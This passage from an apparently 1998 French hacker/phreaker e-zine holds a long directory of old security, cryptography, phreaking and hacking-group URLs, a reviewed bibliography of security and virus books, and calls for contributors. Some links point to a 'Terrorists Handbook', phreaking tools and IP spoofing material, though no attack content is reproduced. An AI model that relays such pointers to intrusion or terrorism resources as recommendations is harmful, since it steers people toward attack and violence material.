www.eecs.nwu.edu/~jmyers/bugtraq/about.html www.eecs.nwu.edu/~jmyers/bugtraq/archives.html www.eecs.nwu.edu/~jmyers/bugtraq/index.html (Bugtraq) www.eecs.nwu.edu/~jmyers/ids/index.html (Intrusion Detection Systems) www.eff.org www.eff.org/pub/Alerts www.eff.org/pub/Net_info/Tools/Crypto/ www.emap.co.uk/partners/racal-airtech (Racal-Airtech) www.ensta.fr/internet/unix/sys_admin (System administration) www.epic.org www.ericsson.nl (Ericsson) www.etext.org/Zines/ (Zines) www.farmstead.com (Farmstead) www.fbi.gov/fbi/FBI_homepage.html (FBI Homepage) www.fc.net/defcon (DefCon) www.fedworld.gov (Federal Government) www.first.org/first/ (FIRST) www.fonorola.net (Fonorola (a Canadian carrier) www.frus.com (Firewalls R Us) www.gbnet.net/kbridge (KarlBridge) www.getnet.com/crak (CRAK Software) www.getnet.com/~vision www.gold.net/users/cw78 (FleXtel) www.greatcircle.com (Great Circle Associates) www.gsu.edu/~socrerx/catalog.html www.gta.com/index.html (Global Technology Associates) www.gti.net/grayarea (Gray Areas) www.hotwired.com (Wired Magazine) www.hpcc.gov/blue94/section.4.6.html (NSA) www.hq2.telecom.ie (Telecom Eireann) www.iacr.org/~iacr (International Association of Cryptologic Research (IACR) www.ibmpcug.co.uk/~Vidtron (Videotron) www.ic.gov (Central Intelligence Agency Home Page) www.ifi.uio.no/~staalesc/PGP/home.html www.iia.org/~gautier/me.html (Rich Gautier's Home Page) www.indirect.com/www/evildawg www.indirect.com/www/johnk/ (CRAK Software) www.ingress.com (Ingress Communications) www.interaccess.com/trc/tsa.html www.io.org/~djcl/phoneb.html www.iquest.net/~oseidler (Oliver Seidler's WWW Page) www.itd.nrl.navy.mil/ITD/5540 (NRL Center for High Assurance Computer Systems) www.itu.ch/TELECOM (Telecom '95) www.jagunet.com/~john/ www.jedefense.com/jed.html (Journal of Electronic Defense) www.l0pht.com/cdc.html (Cult of the Dead Cow) www.l0pht.com/radiophone (Radiophone Archive) www.l0pht.com/~oblivion/IIRG.html (International Information Retrieval Guild Archive Site) www.lat.com (Los Altos Technologies) www.lerc.nasa.gov/Unix_Team/Dist_Computing_Security.html (Security) www.lib.iup.edu/~seaman/hack/bone.html (Bone's H/P/C page o' rama) www.links.net www.louisville.edu/~wrbake01 (The GodZ of CyberSpacE) www.lysator.liu.se:7500/mit-guide/mit-guide.html (Lockpicking Guide) www.lysator.liu.se:7500/terror/thb_title.html (Terrorists Handbook) www.magi.com/~vektor/linenoiz.html www.mastercard.com (Secure Electronic Payment Protocol) www.mcs.com/~candyman/http/radio.html (Radar) www.mcs.com/~candyman/under.html (Cell) www.mcs.net/~candyman (H/P) www.mgmua.com/hackers/index.html (Hackers, the movie) www.milkyway.com (Milkyway Networks Corporation) www.mit.edu:8001/people/warlord/pgp-faq.html (PGP 2.6.2 FAQ, Buglist, Fixes, and Improvements) www.monmouth.com/~jshahom (The Insomniac's Home Page) www.mot.com (Motorola) www.mpr.ca/ (MPR Teltech Ltd) www.msen.com/~emv/tubed/spoofing.html (Info on IP spoofing attacks) www.mwjournal.com/mwj.html (Microwave Journal) www.ncsa.uiuc.edu/SDG/Software/Mosaic/Docs/security.html(Security in Mosaic) www.ncsl.nist.gov (NIST Computer Systems Laboratory) www.net23.com (Max Headroom) www.netpart.com (NetPartners) www.netresponse.com:80/zldf/ www.nic.surfnet.nl/surfnet/security/cert-nl.html(CERT-NL) www.nist.gov (NIST) www.nokia.com (Nokia) www.nortel.com (Northern Telecom) www.ntt.jp (Nippon Telephone) www.nynex.co.uk/nynex (NYNEX) www.odci.gov (The CIA) www.one2one.co.uk (Mercury One-2-One) www.open.gov.uk/oftel/oftelwww/oftelhm.htm (OFTEL's Home Page) www.openmarket.com/info/cryptography/applied_cryptography.html www.pacbell.com (Pacific Bell) www.panix.com/vtw www.paranoia.com/astrostar/fringe.html www.paranoia.com/hpa (Paranoia's H/P/A Links) www.paranoia.com/mthreat (ToneLoc) www.paranoia.com/~coldfire (Cold Fire's Web Page) www.paranoia.com/~darkfox (Darkfox's Home Page) www.paranoia.com/~ice9 (Ice-9's Home Page) www.pegasus.esprit.ec.org/people/arne/pgp.html (PGP) www.phantom.com/~darkcyde (DarkCyde) www.phantom.com/~king (Randy King's WWW Page) www.phillips.com (Phillips Electronics) www.phred.org (The Phred Networking Organization) www.pic.net/uniloc/starlink (Starlink) www.planet.net/onkeld (BlueBeep Home Page) www.primenet.com/~kludge/haqr.html (Kludge) www.quadralay.com/www/Crypt/Crypt.html (Quadralay Cryptography) www.qualcomm.com/cdma/wireless.html (Qualcomm CDMA) www.ramp.com/~lcs/winpgp.html (PGP with MS/Win) www.raptor.com (Raptor) www.raptor.com/raptor/raptor.html (Raptor Network Isolator) www.research.att.com (AT&T) www.rocksoft.com/~ross (Rocksoft Pty (Veracity) www.rogers.com (Rogers Communications) www.rsa.com (RSA Data Security) www.sasknet.sk.ca/Pages/sktlhome.html (SaskTel) www.satelnet.org/~ccappuc www.sccsi.com/lsli/lsli.homepage.html (PORTUS) www.sctc.com (Secure Computing Corporation) www.seas.upenn.edu/~rourkem (FakeMail FAQ) www.seduction.com www.sei.cmu.edu/SEI/programs/cert.html (CERT Coordination Center) www.service.com/cm/uswest/usw1.html (USWest) www.shore.net/~eskwired/hp.html www.soci.niu.edu/~cudigest www.somar.com (Somar Software) www.soscorp.com (Sources of Supply Corp) www.spatz.com/pecos/index.html (The World of Hacking) www.spy.org (Computer Systems Consulting) www.spy.org (spy.org) www.sri.com (SRI) www.stentor.ca (Stentor (Canadian telcos) www.tecc.co.uk/public/uk-telecom/btns.html (BT "star services") www.telecoms-mag.com/tcs.html (Telecommunications Magazine) www.telkom.co.za (Telkom S.A. Ltd) www.telstra.com.au/info/security.html (Security Reference Index) www.teresa.com www.tezcat.com/web/security/security_top_level.html www.tiac.net/users/triad/philes/jokai.html (Jokai Reservation for the Preservation of the 1st Amendment) www.ticllc.net/~scrtnizr www.tis.com (Trusted Information Systems) www.trcone.com/t_crookb.html (CrookBook) www.tregistry.com/ttr (Telecomunications Training Courses) www.tri.sbc.com (Southwestern Bell) www.tricon.net/Comm/synapse (Synapse Magazine) www.tufts.edu/~jpagano/ www.uccs.edu/~abusby/hpawebsites.html www.uccs.edu/~abusby/k0p.html (kn0wledge phreak) www.uci.agh.edu.pl/pub/security (Security) www.uknet.net/pnc (The Personal Number Company) www.umcc.umich.edu/~doug/virus-faq.html (Virus) www.underground.org (underground.org) www.underground.org/bugs/ www.usfca.edu/crackdown/crack.html (Hacker Crackdown) www.vodafone.co.uk (Vodafone) www.vptt.ch/natel.html (Natel) www.wam.umd.edu/~ankh/public/devil_does_unix www.warwick.ac.uk/WWW/search/Phones/nng.html (National Number Group Codes) www.well.com/user/abacard www.well.com/user/crunch (Captain Crunch) www.wfu.edu/~wilsonbd www.wiltel.com (Wiltel) www.wiltel.com/glossary/glossary.html (Telecommunications Glossary) www.wired.com (HotWired) www2.undernet.org:8080/~cs93jtl/IRC.html (IRC) OUA !!! ca en fait un paquet : Les sites francais à present : ftp : ??? www: http://www.chez.com/norace/ NoRace : groupe de phreak http://www.micronet.fr/~darcelf/ Le hacking en france http://www.chez.com/palm/ Page du hackeur Palm http://www.frhack.org Groupe de frhack http://www.linux-france.com Linux France http://www.linux.sos-informatique.com Un autre site Linux en francais http://www.linux-kheops.com/ Kheops http:// PGP Les bouquins interressants : En anglais (toujour tire du faq de 2600(on vous l'a traduit quand meme)): Securite general des ordinateurs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Computer Security Basics Auteur: Deborah Russell and G.T. Gengemi Sr. Editeur: O'Reilly & Associates, Inc. Copyright Date: 1991 ISBN: 0-937175-71-4 C'est un excellent bouquin. Il donne une vue general de la securite informatique sans sacridier les details. C bon pour le commencement des experts en securites. Information Systems Security auteur: Philip Fites and Martin Kratz Editeur: Van Nostrad Reinhold Copyright Date: 1993 ISBN: 0-442-00180-0 Computer Related Risks Auteur: Peter G. Neumann Editeur: Addison-Wesley Copyright Date: 1995 ISBN: 0-201-55805-X Computer Security Management Auteur: Karen Forcht Editeur: boyd & fraser publishing company Copyright Date: 1994 ISBN: 0-87835-881-1 The Stephen Cobb Complete Book of PC and LAN Security Aureur: Stephen Cobb Editeur: Windcrest Books Copyright Date: 1992 ISBN: 0-8306-9280-0 (hardback) 0-8306-3280-8 (paperback) Security in Computing Auteur: Charles P. Pfleeger Editeur: Prentice Hall Copyright Date: 1989 ISBN: 0-13-798943-1. Building a Secure Computer System Auteur: Morrie Gasser Editeur: Van Nostrand Reinhold Co., New York. Copyright Date: ISBN: 0-442-23022-2 Modern Methods for Computer Security Auteur: Lance Hoffman Editzue: Prentice Hall Copyright Date: 1977 ISBN: Windows NT 3.5 Guidelines for Security, Audit and Control Auteur: Editeur: Microsoft Press Copyright Date: ISBN: 1-55615-814-9 Protection and Security on the Information Superhighway Auteur: Dr. Frederick B. Cohen) Editeur: John Wiley & Sons Copyright Date: 1995 ISBN: 0-471-11389-1 Commonsense Computer Security Auteur: Martin Smith editeur: McGraw-Hill Copyright Date: 1993 ISBN: 0-07-707805-5 Combatting Computer Crime Auteur: Jerry Papke editeur: McGraw-Hill, Inc. / Chantico Publishing Company, Inc. Copyright Date: 1992 ISBN: 0-8306-7664-3 Computer Crime: a Crimefighters Handbook Auteur: David Icove, Karl Seger and William VonStorch Editeur: O'Reilly & Associates Copyright Date: 1995 ISBN: 1-56592-086-4 Securite des system Unix ~~~~~~~~~~~~~~~~~~~~~~~~ Practical Unix Security Auteur: Simson Garfinkel and Gene Spafford Editeur: O'Reilly & Associates, Inc. Copyright Date: 1991 ISBN: 0-937175-72-2 Firewalls and Internet Security Auteur: William Cheswick and Steven Bellovin Editeur: Addison Wesley Copyright Date: 1994 ISBN: 0-201-63357-4 Unix System Security Auteur: Rik Farrow Editeur: Addison Wesley Copyright Date: 1991 ISBN: 0-201-57030-0 Unix Security: A Practical Tutorial Auteur: N. Derek Arnold Editeur: McGraw Hill Copyright Date: 1993 ISBN: 0-07-002560-6 Unix System Security: A Guide for Users and Systems Administrators Auteur: David A. Curry Editeur: Addison-Wesley Copyright Date: 1992 ISBN: 0-201-56327-4 Unix System Security Auteur: Patrick H. Wood and Stephen G. Kochan Editeur: Hayden Books Copyright Date: 1985 ISBN: 0-672-48494-3 Unix Security for the Organization Auteur: Richard Bryant Editeur: Sams Copyright Date: 1994 ISBN: 0-672-30571-2 Building Internet Firewalls Auteur: D. Brent Chapman and Elizabeth D. Zwicky Editeur: O'Reilly and Associates, Inc. Copyright Date: 1995 ISBN: 1-56592-124-0 Unix System Security Essentials Auteur: Christopher Braun Editeur: Addison Wesley Copyright Date: 1995 ISBN: 0-201-42775-3 Internet Firewalls and Network Security Auteur: Karanjit S. Siyan and Chris Hare Editeur: New Riders Publishing Copyright Date: 1995 ISBN: 1-56205-437-6 Network Security ~~~~~~~~~~~~~~~~ Network Security Secrets Auteur: David J. Stang and Sylvia Moon Editeur: IDG Books Copyright Date: 1993 ISBN: 1-56884-021-7 On note un gaspillage total de papier. Le bouquin ne vaut pas son prix : $45.95. Le livre est une reprise des informations deja publies. Le seul secret que l'on apprend est que Sylvia Moon est une jeune femme qui a un rapport amoureux avec le vieux David Stang. Passez votre chemin... Complete Lan Security and Control Auteur: Peter Davis Editeur: Windcrest / McGraw Hill Copyright Date: 1994 ISBN: 0-8306-4548-9 and 0-8306-4549-7 Network Security Auteur: Steven Shaffer and Alan Simon Editeur: AP Professional Copyright Date: 1994 ISBN: 0-12-638010-4 Network Security: How to Plan For It and How to Achieve It Auteur: Richard M. Baker Editeur: McGraw-Hill, Inc. Copyright Date: ISBN: 0-07-005141-0 Network Security Auteur: Steven L. Shaffer and Alan R. Simon Editeur: Academic Press Copyright Date: 1994 ISBN: 0-12-638010-4 Network Security: Private Communications in a Public World Auteur: Charlie Kaufman, Radia Perlman and Mike Speciner Editeur: Prentice Hall Copyright Date: 1995 ISBN: 0-13-061466-1 Network and Internetwork Security: Principles and Practice Auteur: William Stallings Editeur: Prentice Hall Copyright Date: 1995 ISBN: 0-02-415483-0 Implementing Internet Security Auteur: William Stallings Editeur: New Rider Publishing Copyright Date: 1995 ISBN: 1-56205-471-6 Actually Useful Internet Security Techniques Auteur: Larry J. Hughes, Jr. Editeur: New Riders Publishing Copyright Date: 1995 ISBN: 1-56205-508-9 Cryptology ~~~~~~~~~~~~ Applied Cryptography: Protocols, Algorithms, and Source Code in C Auteur: Bruce Schneier Editeur: John Wiley & Sons Copyright Date: 1994 ISBN: 0-471-59756-2 Le livre de Bruce Schneider remplace tout les autre textes en matiere de cryptographie. Si vous etes interresse, c'est vraiment un livre à lire. C le premier et le dernier livre dont vous pouvez avoir besoin d'acheter. Cryptography and Data Security Auteur: Dorothy Denning Editeur: Addison-Wesley Publishing Co. Copyright Date: 1982 ISBN: 0-201-10150-5 Protect Your Privacy: A Guide for PGP Users Auteur: William Stallings Editeur: Prentice-Hall Copyright Date: 1994 ISBN: 0-13-185596-4 Codebreakers Auteur: Kahn Editeur: Simon and Schuster Copyright Date: ISBN:0-02-560460-0 Codebreakers: The Inside Story of Bletchley Park Auteur: Francis Harry Hinsley and Alan Stripp Editeur: Oxford University Press, Copyright Date: 1993 ISBN:0-19-285304-X Cryptanalysis, a study of ciphers and their solution Auteur: Gaines, Helen Fouche Editeur: Dover Publications Copyright Date: 1956 ISBN: Computer Privacy Handbook Auteur: Andre' Bacard Editeur: Peachpit Press Copyright Date: 1995 ISBN: 1-56609-171-3 E-Mail Security with PGP and PEM Auteur: Bruce Schneier Editeur: John Wiley & Sons Copyright Date: 1995 ISBN: 0-471-05318-X PGP: Pretty Good Privacy Auteur: Simson Garfinkel Editeur: O'Reilly & Associates, Inc. Copyright Date: 1995 ISBN: 1-56592-098-8 Programmed Threats ~~~~~~~~~~~~~~~~~~ The Little Black Book of Computer Viruses Auteur: Mark Ludwig Editeur: American Eagle Publications Copyright Date: 1990 ISBN: 0-929408-02-0 The Giant Black Book of Computer Viruses Auteur: Mark Ludwig Editeur: American Eagle Publications Copyright Date: 1995 ISBN: Computer Viruses, Artificial Life and Evolution Auteur: Mark Ludwig Editeur: American Eagle Publications Copyright Date: 1993 ISBN: 0-929408-07-1 Computer Viruses, Worms, Data Diddlers, Killer Programs, and Other Threats to Your System Auteur: John McAfee and Colin Haynes Editeur: St. Martin's Press Copyright Date: 1989 ISBN: 0-312-03064-9 and 0-312-02889-X The Virus Creation Labs: A Journey Into the Underground Auteur: George Smith Editeur: American Eagle Publications Copyright Date: 1994 ISBN: 0-929408-09-8 A Short Course on Computer Viruses Auteur: Dr. Fred Cohen Editeur: John Wiley & Sons Copyright Date: 1994 ISBN: 0-471-00769-2 Robert Slade's Guide to Computer Viruses Auteur: Robert Slade Editeur: Springer-Verlag Copyright Date: 1994 ISBN: 0-387-94311-0 / 3-540-94311-0 Telephony ~~~~~~~~~ Engineering and Operations in the Bell System Auteur: R.F. Rey Editeur: Bell Telephont Laboratories Copyright Date: 1983 ISBN: 0-932764-04-5 Bienqu'il soit un peu vieux, ce livre est surement le bouquin pour la telecomunication. Ce livre est 100% Bell et est adore par les Phreakers du monde entier. Telephony: Today and Tomorrow Auteur: Dimitris N. Chorafas Editeur: Prentice-Hall Copyright Date: 1984 ISBN: 0-13-902700-9 The Telecommunications Fact Book and Illustrated Dictionary Auteur: Ahmed S. Khan Editeur: Delmar Publishers, Inc. Copyright Date: 1992 ISBN: 0-8273-4615-8 Ce dictionnaire peut etre une exellente reference pour le sujet. Pour tous ceux qui compte s'y mettre... Tandy/Radio Shack Cellular Hardware Auteur: Judas Gerard and Damien Thorn Editeur: Phoenix Rising Communications Copyright Date: 1994 ISBN: The Phone Book Auteur: Carl Oppendahl Editeur: Consumer Reports Copyright Date: ISBN: 0-89043-364-x Principles of Caller I.D. Auteur: Editeur: International MicroPower Corp. Copyright Date: ISBN: Hacking History and Culture ~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Hacker Crackdown: Law and Disorder on the Electronic Frontier Auteur: Bruce Sterling Editeur: Bantam Books Copyright Date: 1982 ISBN: 0-553-56370-X Bruce Sterling a realise recemment le livre gratuit sur le net. Le livre est plus facile a lite dans sa forme imprime et il ne coute que $5.99. Monsieur Sterling est un exellent auteur de science fiction et a prouve son talent en mettant aux service de l'underground informatique ses mots. Une tres belle experience en perspective... Cyberpunk Auteur: Katie Hafner and John Markoff Editeur: Simon and Schuster Copyright Date: 1991 ISBN: 0-671-77879-X The Cuckoo's Egg Auteur: Cliff Stoll Editeur: Simon and Schuster Copyright Date: 1989 ISBN: 0-671-72688-9 Hackers: Heroes of the Computer Revolution Auteur: Steven Levy Editeur: Doubleday Copyright Date: 1984 ISBN: 0-440-13495-6 Unclassified ~~~~~~~~~~~~ The Hacker's Handbook Auteur: Hugo Cornwall Editeur: E. Arthur Brown Company Copyright Date: ISBN: 0-912579-06-4 Secrets of a Super Hacker Auteur: The Knightmare Editeur: Loompanics Copyright Date: 1994 ISBN: 1-55950-106-5 The Knightmare n'est pas un super hacker. On apprend peu ou pas du tout d'informations. The Knightmare vous donne quelque conseil du style ne pas vous deguiser avant de faire du trashing (fouiller les les poubelles). Le meilleur hack de The Knightmare c'est d'avoir fouler ces memorables ordures. The Day The Phones Stopped Auteur: Leonard Lee Editeur: Primus / Donald I Fine, Inc. Copyright Date: 1992 ISBN: 1-55611-286-6 ToTTAl GarBage !!!! Information Warfare Auteur: Winn Swartau Editeur: Thunder Mountain Press Copyright Date: 1994 ISBN: 1-56025-080-1 An Illustrated Guide to the Techniques and Equipment of Electronic Warfare Auteur: Doug Richardson Editeur: Salamander Press Copyright Date: ISBN: 0-668-06497-8 En français : tous les editeurs dont nous parlons editent en France : pour les autres francophones (Quebec, Suisse, Belgique, etc) il va falloir vous renseigner. Reseaux et telecommunication en general : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reseaux et telematique (tome 1 et 2) Auteurs: G.Pujolle, D.Seret, D.Dromart, E.Horlait. Editeur: Eyrolles Copyright Date : 1987 Un vieux bouquin mais complet. Les auteurs nous parlent aussi bien de la transmission d'informations que de l' architecture des reseaux, de la cryptographie, en passant par l'etude de transpac et de tymnet... C vraiment un bouquin complet et qui part des base... C'a interressera aussi bien les hacker que les phreaker... Les reseaux d'entreprise Auteur: Guy Pujolle Editeur:Eyrolles Copyright Date: 1984 Vieux, vieux, vieux.... PBX, Ethernet, Banube, Znet... C bon pour revoir ces bases... Telecommunication et reseaux Auteur: Guy Pujolle Editeur: Eyrolles Copyright Date:1992 Voila quelque chose d'un peu plus recent... Toujour sur l' architecture des reseaux, leur ingieneries, etc. Initiation à l'architecture reseaux Auteur: Xavier Perras Editeur: Dunod Copyright Date: 1991 Communication MODEMS Telematique Auteurs: Bernhard Richelmunn, Gerald List, Jochen Richter. Editeur: Micro Application Copyright Date: 1991 Les reseaux sans fils Auteur: J-M Perrichon Editeur: Masson Copyright Date: 1995 Livre assez recent par rapport aux autre et à son sujet. C vraiment le must pour la telephonie cellulaire. A lire sans hesiter. Securite generale des systemes et des reseaux: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Securite reseaux Auteurs: David J. Stang & Sylvia Moon Editeur: Dunod Copyright date: 1996 Un bon livre qui parle vraiment de tout. De Unix aux passerelles. Mais qui parfois manque de details. Dommage. Linux\Unix : ~~~~~~~~~~~~ Linux Auteur : Timothy Parker (traduction) Editeur : s&sM Copyright Date :1997 Pour installer Linux et apprendre c rouage. Debutants à confirmes. Unix Auteur : Michael Wielsh (traduction) Editeur : Micro Application Copyright Date : 1997 Un tres bon bouquins passant entre autre du systeme de fichier à la programmation du shell. De plus il a l'interet d'etre cour. Beaucoup d'autre bouquins sont disponibles sur les les systemes d'exploitation. Et ce qu'on vous a site sont surtout fait pour les debutants. Mais on pense que les inities pourrons trouver les leurs. Programmation : ~~~~~~~~~~~~~~~ Le langage C. Auteur : Tony Zhang (traduction) Editeur : s&sM Copyright Date : 1997 Pour debutant. Le langage C++. Auteur : Jesse Liberty Editeur : s&sM Copyright Date : 1997 Meme chose : pour debutant. C bouquins sont tous pour debutants. L'edition qu'on vous conseil si vous etes deja + un newbie est l'edition O'Reilly (mais avait on besoin de le rappeller??). www.editions-oreilly.fr/ Autres : ~~~~~~~~ Disco Biscuit Auteurs: Beaucoup Editeur : Alpha Bleu etrangere Copyright date : 1998 Un tres, tres bon livre sur la scene techno, house, trance, Acide House,etc. Beaucoup d'ecsta et de popers en perspactive Bon il y en a beaucoup d'autre, mais bon, on avaient un peu la flaime... Si vous voulez nous soumettre d'autre bouquins c le moment, parce que nous ca nous emmerde!!!! /----------\ /(__)____(__)\ |#h/p/c/l/p-1| / xx/yy/1998 \ \##############/ \&&&&&&&&&&&&/ \__________/ PETITES ANNONCES : On cherche : quelqu'un de bon en ce qui concerne les modulars (pour qui c la SPECIALITE) qui pourrait faire un article digne de ce nom. Pareil pour les PBX ou PABX... Des mecs bons en programmation (c++, java, c, Pascal, Borland, Delphi...), pour une campagne anti microsoft sur le net. On cherche tout simplement des gens doues, pour ecrire des art. _____________ Conclusion : \ ______________\ voila pour cette premiere edition... Faites nous part de vos impressions en ecrivant a : h_p_c_l_plemag@yahoo.com. On vous encourage sincerement à ecrire quelque chose pour le mag, c de VOUS que la scene pourra avancer. Bref on espere que vous allez vous bouger un peu. Peur d'ecrire des choses ridicules ??? Il n'y a aucune peur à avoir. Les lamers sont ceux qui n'ecrivent rien et qui se disent hacker. Les vraix hacker sont ceux qui font profiter leur connaissance aux autres (c dans la charte du hacker) et surtout leur erreurs... On vous dit tout de suite que le temps que le numero deux mettra a sortir sera proportionnel à ce que VOUS ferez... A bientot (peut etre). Thanks : -------- trom, SoD et Tripbomb qui ont ete les premiers a repondre a l'appel Merci à Code-Bar, pour son aide et son soutien... Merci a Psykaos (tant pis pour les majuscules) qui a failli ecrire un art. sur les Box, mais qui a ete frappe par une amnesie (temporaire, on l' espere). Merci à vous, oui VOUS qui derrieres votre ecran lisez ce mag pourri, qui n'arrive pas a la cheville d'un Noroute ou Noway, maiq qui reanime la scene francophone...